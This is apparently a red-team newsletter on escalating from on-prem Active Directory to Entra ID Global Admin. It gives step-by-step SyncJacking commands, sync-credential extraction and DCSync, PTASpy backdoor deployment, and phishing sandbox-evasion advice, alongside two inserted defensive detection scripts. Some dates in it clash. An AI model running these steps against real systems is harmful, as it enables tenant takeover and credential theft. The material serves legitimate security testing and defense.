SyncJacking: On-Prem AD to Cloud Admin


June 7, 2026


👋 Introduction

Hey everyone!

Last issue we covered OAuth Device Code Flow phishing, where attackers abuse cloud identity flows to bypass MFA from outside the perimeter. This week we go the other direction: attackers already inside the on-premises AD, pivoting straight to Entra ID Global Administrator without touching a cloud password reset.

Hybrid AD environments are the rule, not the exception. Most organizations running Microsoft 365 have Entra Connect installed somewhere on their network, quietly syncing identities between on-prem Active Directory and the cloud. That sync server is Tier-0 infrastructure. Compromise it and you own the bridge between both worlds.

This issue covers the SyncJacking technique, MSOL credential extraction, Pass-Through Authentication agent backdoors, the surviving sync API abuse paths, and the tooling that maps all of it.

Let’s get into it 👇

🏗️ Entra Connect Architecture: The Bridge You Need to Cross

Microsoft Entra Connect (formerly Azure AD Connect) runs as an on-premises service and maintains three key accounts attackers care about.

The AD DS Connector account (prefixed MSOL_ or AAD_) lives in your on-prem domain. It holds Replicate Directory Changes and Replicate Directory Changes All rights on the domain, which means DCSync. It also has GenericWrite over user objects for password writeback. If you’re working an on-prem engagement and see those rights in BloodHound, you found the sync account.

The Entra Connector account (also called the AAD Sync account) is the cloud-side identity. Historically, older deployments assigned it the Global Administrator role. Microsoft patched that in 2024, stripping the Directory Synchronization Accounts role down from 48 permissions to one. But the role still reaches the private sync API, and that API still does things it shouldn’t.

The ADSync service account runs the sync process itself and holds the local SQL database credentials. Anything stored in that database, including service account passwords, is encrypted with DPAPI under the service account context, which means local admin on the sync server breaks it.

All three accounts feed into one attack surface. The sync server is a Tier-0 asset sitting on a domain member server, not a domain controller, often protected like a workstation.

🔍 Enumerating the Attack Surface

BloodHound with AzureHound data shows you the path. After collecting from both your on-prem AD and the Entra tenant, look for the SyncToEntra and AZAddMembers edges in the attack graph.

# AzureHound collection
./azurehound -u "[email protected]" -p "password" list --tenant "tenant.onmicrosoft.com" -o output.json

# Import into BloodHound CE, then query:
# MATCH p=(n)-[:SyncedToEntraUser]->(m) RETURN p

From within the domain, find the MSOL account directly. Its description field often contains the server name:

# Find MSOL/AAD accounts by name pattern
Get-ADUser -Filter {SamAccountName -like "MSOL_*" -or SamAccountName -like "AAD_*"} -Properties Description, MemberOf

# Check for DCSync rights (Replicate Directory Changes)
(Get-ACL "AD:\DC=corp,DC=local").Access | Where-Object {
    $_.ActiveDirectoryRights -match "ExtendedRight" -and
    $_.IdentityReference -match "MSOL"
}

Once you identify the sync server (the MSOL description usually contains the hostname), check whether you can reach port 1433 locally or via lateral movement. That SQL instance is the credential store.

💥 SyncJacking: Hard Match Hijacking to Global Admin

SyncJacking, published by Semperis in January 2026, abuses how Entra Connect matches on-prem accounts to cloud identities during synchronization.

Hard matching uses the mS-DS-ConsistencyGuid attribute (newer deployments) or objectGUID (older) as an immutable anchor. When Entra Connect syncs an object, it looks up the cloud identity with a matching ImmutableID. The cloud ImmutableID is the base64-encoded on-prem GUID. Whoever controls that attribute controls which cloud identity the on-prem account maps to.

The attack requires write access to an unsynchronized on-prem account and delete access to the target synchronized account. Both are low-privilege operations in a typical domain.

# Step 1: Copy the target's mS-DS-ConsistencyGuid to your controlled account
$target = Get-ADUser "GlobalAdmin" -Properties mS-DS-ConsistencyGuid, UserPrincipalName
$attacker = Get-ADUser "LowPrivUser"

# Copy the consistency GUID
Set-ADUser $attacker -Replace @{"mS-DS-ConsistencyGuid" = $target.'mS-DS-ConsistencyGuid'}  # hyphenated property names must be quoted

# Step 2: Copy the UPN (so the cloud finds your account by name)
Set-ADUser $attacker -UserPrincipalName $target.UserPrincipalName

# Step 3: Delete the original synchronized account
Remove-ADUser $target

# Step 4: Force a sync cycle
Import-Module ADSync
Start-ADSyncSyncCycle -PolicyType Delta

After the next sync, Entra Connect links your controlled account to the cloud identity that held the Global Administrator role. Authenticate to the cloud with your own password. You own the tenant.

Microsoft confirmed this as an Important privilege escalation vulnerability in May 2025. Enforcement-level hardening was planned for March 2026, with a hard enforcement date of July 1, 2026, blocking Entra Connect from modifying the OnPremisesObjectIdentifier attribute once a mapping exists. Environments running patched versions of Entra Connect have this blocked. Unpatched environments, and there are plenty, still expose the full attack.

Tenable’s follow-up research found that even after Microsoft’s 2024 hardening, the Directory Synchronization Accounts role continues to call the private sync API. That API allows password resets and user modifications against hybrid users without the permissions the portal enforces. The On Premises Directory Sync Account role, a newer undocumented variant, carries identical capabilities.
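Because the cloud ImmutableID is just the base64 of the on-prem anchor GUID, a defender can reconcile every cloud user's anchor back to the on-prem object that currently holds it and flag the mismatch a hard-match hijack leaves behind. This is an added example, not code from the original post or from any tool it names; the field names and the sample users are constructed, and `onprem_sid` stands for the cloud user's onPremisesSecurityIdentifier.

```python
import base64
import uuid

def guid_to_immutable_id(guid: str) -> str:
    # Entra's ImmutableID is the base64 of the GUID's 16 bytes in the order
    # AD stores them (first three fields little-endian), i.e. .NET ToByteArray().
    return base64.b64encode(uuid.UUID(guid).bytes_le).decode()

def immutable_id_to_guid(immutable_id: str) -> str:
    return str(uuid.UUID(bytes_le=base64.b64decode(immutable_id)))

def reconcile(on_prem, cloud):
    """Flag cloud users whose anchor no longer points at the on-prem object
    they were originally linked to. Both inputs are lists of dicts."""
    by_anchor, findings = {}, []
    for u in on_prem:
        anchor = u["consistency_guid"].lower()
        if anchor in by_anchor:  # two on-prem objects share one anchor
            findings.append(("ANCHOR_COLLISION", u["sam"], by_anchor[anchor]["sam"]))
        by_anchor.setdefault(anchor, u)
    for c in cloud:
        src = by_anchor.get(immutable_id_to_guid(c["immutable_id"]).lower())
        if src is None:  # anchor resolves to nothing on-prem (source deleted?)
            findings.append(("ORPHANED_ANCHOR", c["upn"], None))
        elif src["sid"] != c["onprem_sid"]:
            # The UPN may match (the attacker copies it), but the SID of the
            # object now holding the anchor is not the SID Entra recorded.
            findings.append(("SID_MISMATCH", c["upn"], src["sam"]))
    return findings

GA_GUID = "3f2504e0-4f89-11d3-9a0c-0305e82c3301"   # constructed sample values
JD_GUID = "8a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9"
SVC_GUID = "0b7e3c11-2d4f-4a6b-9c8d-1e2f3a4b5c6d"

def demo():
    # Constructed snapshot after a hijack: ga.admin was deleted, lowpriv now
    # carries its anchor and UPN, and svc's source object is gone entirely.
    on_prem = [
        {"sam": "jdoe", "upn": "jdoe@corp.local", "sid": "S-1-5-21-1-2-3-1105", "consistency_guid": JD_GUID},
        {"sam": "lowpriv", "upn": "ga@corp.local", "sid": "S-1-5-21-1-2-3-2210", "consistency_guid": GA_GUID},
    ]
    cloud = [
        {"upn": "jdoe@corp.local", "immutable_id": guid_to_immutable_id(JD_GUID), "onprem_sid": "S-1-5-21-1-2-3-1105"},
        {"upn": "ga@corp.local", "immutable_id": guid_to_immutable_id(GA_GUID), "onprem_sid": "S-1-5-21-1-2-3-1500"},
        {"upn": "svc@corp.local", "immutable_id": guid_to_immutable_id(SVC_GUID), "onprem_sid": "S-1-5-21-1-2-3-1300"},
    ]
    return reconcile(on_prem, cloud)

if __name__ == "__main__":
    print(demo())
```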

🗝️ MSOL Credential Extraction

If you land local admin on the Entra Connect server, credential extraction is a single tool invocation away.

# Using AADInternals
Import-Module AADInternals
Get-AADIntSyncCredentials

# Output: AD DS Connector account + Entra Connector account credentials in cleartext

AADInternals decrypts DPAPI-protected credentials from the ADSync local SQL database using the service account’s encryption keys. The AD DS Connector credentials give you DCSync rights against the entire domain. The Entra Connector credentials give you the sync API.

The Fox-IT adconnectdump.py tool provides a Python alternative, useful when PowerShell is restricted:

# Remote credential dump via RPC
python3 adconnectdump.py corp/localadmin:[email protected]

From there, a DCSync against the domain runs through Impacket:

python3 secretsdump.py -just-dc corp/MSOL_abc123:'ExtractedPassword'@dc.corp.local

This is the same DCSync technique from Issue 2’s Kerberos coverage applied through the sync account instead of a direct domain admin. The MSOL account is lower-visibility, often excluded from privileged account monitoring, and survives in compromised environments longer.

🕵️ Pass-Through Authentication Agent Backdoor

If the target uses Pass-Through Authentication instead of Password Hash Sync, a different attack path opens. PTA authenticates cloud logins by forwarding credentials to an on-prem agent, which validates them against AD.

With local admin on a PTA agent server, you can inject PTASpy into the agent process. The injected DLL hooks the ValidateCredentials function and forces it to return true for any credential, then logs every authentication attempt to disk.

# Using AADInternals PTA module
Import-Module AADInternals

# Extract the PTA agent certificate
Export-AADIntProxyAgentCertificates

# Export the bootstrap configuration to avoid IP change detection
Export-AADIntProxyAgentBootstraps

# Deploy the backdoor
.\Configure-PTASpy.ps1 -Certificate cert.pfx -Bootstrap bootstrap.xml

After deployment, every cloud authentication request that routes through this agent accepts any password. Credential harvest accumulates at C:\PTASpy\PTASpy.csv. The attacker can also authenticate as any synced user, including Global Administrators, with a blank password.

Microsoft recommended monitoring CAPI key access as a detection control. There are no PTA-specific event log entries. Defenders correlating on-prem AD authentication with Entra sign-in logs find discrepancies, but without definitive identifiers linking the two.

🛠️ Tools and Detection

For attack path discovery, AzureHound plus BloodHound Community Edition maps every Entra relationship into queryable graph data. Run AzureHound collection before you even touch the sync server.

ROADtools provides Python-based Entra enumeration and token manipulation. ROADrecon dumps all Azure AD objects into a local SQLite database with an Angular web interface for navigation. ROADtx handles token exchange, device registration, and PRT operations for post-exploitation.

# ROADrecon collection
pip install roadrecon
roadrecon auth -u [email protected] -p password
roadrecon gather
roadrecon gui  # Starts web interface at localhost:5000

AADInternals remains the primary PowerShell exploitation framework. The Get-AADIntSyncCredentials, Export-AADIntProxyAgentCertificates, and Set-AADIntUserPassword cmdlets cover the core attack primitives. Note that some AADInternals functions depending on the deprecated MSOnline module no longer work on modern tenants.

For detection: Entra sign-in logs with onPremisesSecurityIdentifier mismatch, changes to the mS-DS-ConsistencyGuid attribute on non-admin accounts in on-prem AD audit logs, and unexpected delta sync cycles are the primary indicators for SyncJacking. Treating the Entra Connect server as a Tier-0 asset with privileged access workstation controls eliminates most of these attack paths before exploitation.
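The on-prem side of that detection is a correlation, not a single event: a write of another account's anchor into mS-DS-ConsistencyGuid, followed closely by deletion of the account that owned it. The following is an added example, not code from the original post or any of the tools it names; the events are constructed dicts modelled on 5136 (attribute modified) and 4726 (user deleted), with the anchor value already normalized to GUID text, and the `anchors` snapshot is assumed to have been exported before the window under review.

```python
from datetime import datetime, timedelta

ANCHOR_ATTR = "mS-DS-ConsistencyGuid"
WINDOW = timedelta(hours=24)  # how close a write and a deletion must be to be linked

def detect_syncjacking(events, anchors):
    """events: DS audit records already parsed into dicts (constructed shape,
    see demo()); anchors: {samAccountName: anchor GUID} snapshot taken
    before the events. Returns one alert per suspicious anchor write."""
    deleted = {e["target"]: e["time"] for e in events if e["id"] == 4726}
    alerts = []
    for e in events:
        if e["id"] != 5136 or e["attribute"] != ANCHOR_ATTR:
            continue
        owner = next((s for s, g in anchors.items()
                      if g.lower() == e["value"].lower() and s != e["target"]), None)
        if owner is None:
            continue  # value is not another account's anchor: normal provisioning
        gone = owner in deleted and abs(deleted[owner] - e["time"]) <= WINDOW
        alerts.append({
            "severity": "HIGH" if gone else "MEDIUM",
            "account": e["target"], "copied_from": owner,
            "by": e["subject"], "owner_deleted": gone,
        })
    return alerts

def _t(s):
    return datetime.fromisoformat(s)

GA_GUID = "3f2504e0-4f89-11d3-9a0c-0305e82c3301"  # constructed
JD_GUID = "8a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9"

def demo():
    # Constructed records: a helpdesk account copies ga.admin's anchor onto
    # lowpriv and deletes ga.admin; a provisioning account writes a fresh
    # anchor to a new hire, which is the benign case and must not alert.
    events = [
        {"time": _t("2026-06-01T09:14:02"), "id": 5136, "subject": "CORP\\helpdesk1",
         "target": "lowpriv", "attribute": ANCHOR_ATTR, "value": GA_GUID},
        {"time": _t("2026-06-01T09:15:40"), "id": 4726, "subject": "CORP\\helpdesk1",
         "target": "ga.admin"},
        {"time": _t("2026-06-01T10:00:00"), "id": 5136, "subject": "CORP\\svc_prov",
         "target": "newhire", "attribute": ANCHOR_ATTR,
         "value": "0b7e3c11-2d4f-4a6b-9c8d-1e2f3a4b5c6d"},
    ]
    anchors = {"ga.admin": GA_GUID, "jdoe": JD_GUID}
    return detect_syncjacking(events, anchors)

if __name__ == "__main__":
    print(demo())
```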

📡 Community Radar

SpecterOps: Don’t Jump the Turnstile - Lessons from the Field

Published May 28, 2026. Zach Stein documents a red team engagement where email sandboxes blocked every phishing iteration, including user-agent filtering and mouse-movement detection. The fix was Cloudflare Turnstile deployed as a verification layer before the payload redirect. The sandbox sees CAPTCHA infrastructure and stops. Real users click through and reach the credential harvester. Detailed Flask implementation with Apache proxying, plus a GitHub repo with automation. If your phishing campaigns are getting flagged mid-engagement, this is worth reading before your next op.

🎯 Key Takeaways

The Entra Connect server is the most dangerous Tier-0 asset most organizations fail to protect like one. Domain member servers routinely have less endpoint detection, weaker PAM controls, and broader admin access than domain controllers. An attacker who can escalate to local admin on the sync server holds credentials for DCSync, cloud identity manipulation, and in PTA environments, an authentication backdoor. The AD enumeration techniques from Issue 19 apply directly to locating the sync server and the MSOL account.

SyncJacking is the highest-impact vector for environments still running unpatched Entra Connect. You need write access to any unsynchronized account and delete access to the target synchronized account, both of which are low-privilege AD operations. The result is Global Administrator in the cloud with minimal audit trail. Microsoft’s enforcement hardening was supposed to land in March 2026, now pushed to July 1, 2026. Every environment with Entra Connect below that enforcement version is still vulnerable to the full attack.

The sync API abuse path from Tenable’s research is the one that survives patching. Even after Microsoft stripped the Directory Synchronization Accounts role down to a single permission, the role’s private API access still allows password resets against hybrid users. This is the attack path that doesn’t require Entra Connect server access at all, just the sync account credentials. Treat those credentials with the same urgency as a krbtgt hash.

For tooling, use AzureHound plus BloodHound to map attack paths before engaging any exploitation. ROADrecon gives you a full tenant snapshot to identify privileged hybrid users and application permissions. AADInternals is the exploitation framework once you’re on the sync server. For engagements where the sync server is out of scope or unreachable, focus on the sync account directly: its on-prem ACL rights enable DCSync against the full domain, and those rights don’t require touching the sync server at all.

Thanks for reading, and happy hunting!

— Ruben
